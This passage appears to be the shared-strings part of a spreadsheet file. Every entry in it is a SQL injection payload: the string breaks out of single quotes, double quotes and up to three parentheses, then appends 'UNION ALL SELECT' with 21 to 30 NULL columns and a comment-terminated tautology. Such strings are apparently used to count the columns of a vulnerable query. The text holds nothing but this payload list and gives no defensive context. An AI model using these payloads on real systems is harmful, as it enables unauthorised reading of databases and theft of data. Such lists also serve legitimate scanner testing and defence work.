    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'LWcr' = 'LWcr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'tGnf' = 'tGnf</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'jCBx' = 'jCBx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'jZZk' = 'jZZk</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'sfxp' = 'sfxp</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ylwa' = 'ylwa</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'gkmh' = 'gkmh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ziJS' = 'ziJS</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nkVN' = 'nkVN</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'qGNw' = 'qGNw</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xbMG' = 'xbMG</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vHsh' = 'vHsh</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vcUX' = 'vcUX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vWJL' = 'vWJL</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vxHM' = 'vxHM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'SvDU' = 'SvDU</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'TXHk' LIKE 'TXHk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'SWXF' LIKE 'SWXF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'VCNo' LIKE 'VCNo</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'aeOg' LIKE 'aeOg</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'DHFs' LIKE 'DHFs</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'AyQr' LIKE 'AyQr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'lYTz' LIKE 'lYTz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'dIYa' LIKE 'dIYa</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'hFOO' LIKE 'hFOO</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'xFXn' LIKE 'xFXn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'zKIq' LIKE 'zKIq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Oedp' LIKE 'Oedp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'eslZ' LIKE 'eslZ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'TAoQ' LIKE 'TAoQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'jaEW' LIKE 'jaEW</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'YWST' LIKE 'YWST</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'brFO' LIKE 'brFO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'vKGD' LIKE 'vKGD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fnSO' LIKE 'fnSO</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'HWiS' LIKE 'HWiS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dlMv' LIKE 'dlMv</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'BkzS' LIKE 'BkzS</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'kfbl' LIKE 'kfbl</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'LeVb' LIKE 'LeVb</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'tYSz' LIKE 'tYSz</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'LGMH' LIKE 'LGMH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'tJuj' LIKE 'tJuj</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'qquc' LIKE 'qquc</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'TPtJ' LIKE 'TPtJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'pjEA' LIKE 'pjEA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'egto' LIKE 'egto</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'RvAW' LIKE 'RvAW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'lMvY' LIKE 'lMvY</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ReQK' LIKE 'ReQK</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'QLty' LIKE 'QLty</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'rxLd' LIKE 'rxLd</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'KVdV' LIKE 'KVdV</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'tjhf' LIKE 'tjhf</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'ioIX' LIKE 'ioIX</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hRHQ' LIKE 'hRHQ</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "odai" = "odai</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "VMoa" = "VMoa</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "IfKN" = "IfKN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "zCji" = "zCji</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "XKUN" = "XKUN</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "OIaA" = "OIaA</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "dXYo" = "dXYo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "Dcvn" = "Dcvn</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "RGmR" = "RGmR</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "sfIq" = "sfIq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "FQJc" = "FQJc</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "EPam" = "EPam</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "AYGw" = "AYGw</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "YVfp" = "YVfp</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "mAiR" = "mAiR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "AEyt" = "AEyt</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "WGBD" = "WGBD</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "hgjk" = "hgjk</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "OrVP" = "OrVP</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  "arRW" = "arRW</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "ndZa" = "ndZa</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "VfeC" = "VfeC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "XwLE" = "XwLE</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WXCe" = "WXCe</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "IUFm" = "IUFm</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "WaiK" = "WaiK</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "njPN" = "njPN</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "DLsx" = "DLsx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "nyRS" = "nyRS</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( "kTtR" = "kTtR</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "GpaO" = "GpaO</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "ofqh" = "ofqh</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "qaby" = "qaby</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "VVbw" = "VVbw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "kUxT" = "kUxT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "hkUP" = "hkUP</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "VzeR" = "VzeR</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "mRRZ" = "mRRZ</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "iZlL" = "iZlL</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND "dVqT" = "dVqT</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( "mARW" LIKE "mARW</t>
  </si>
  <si>
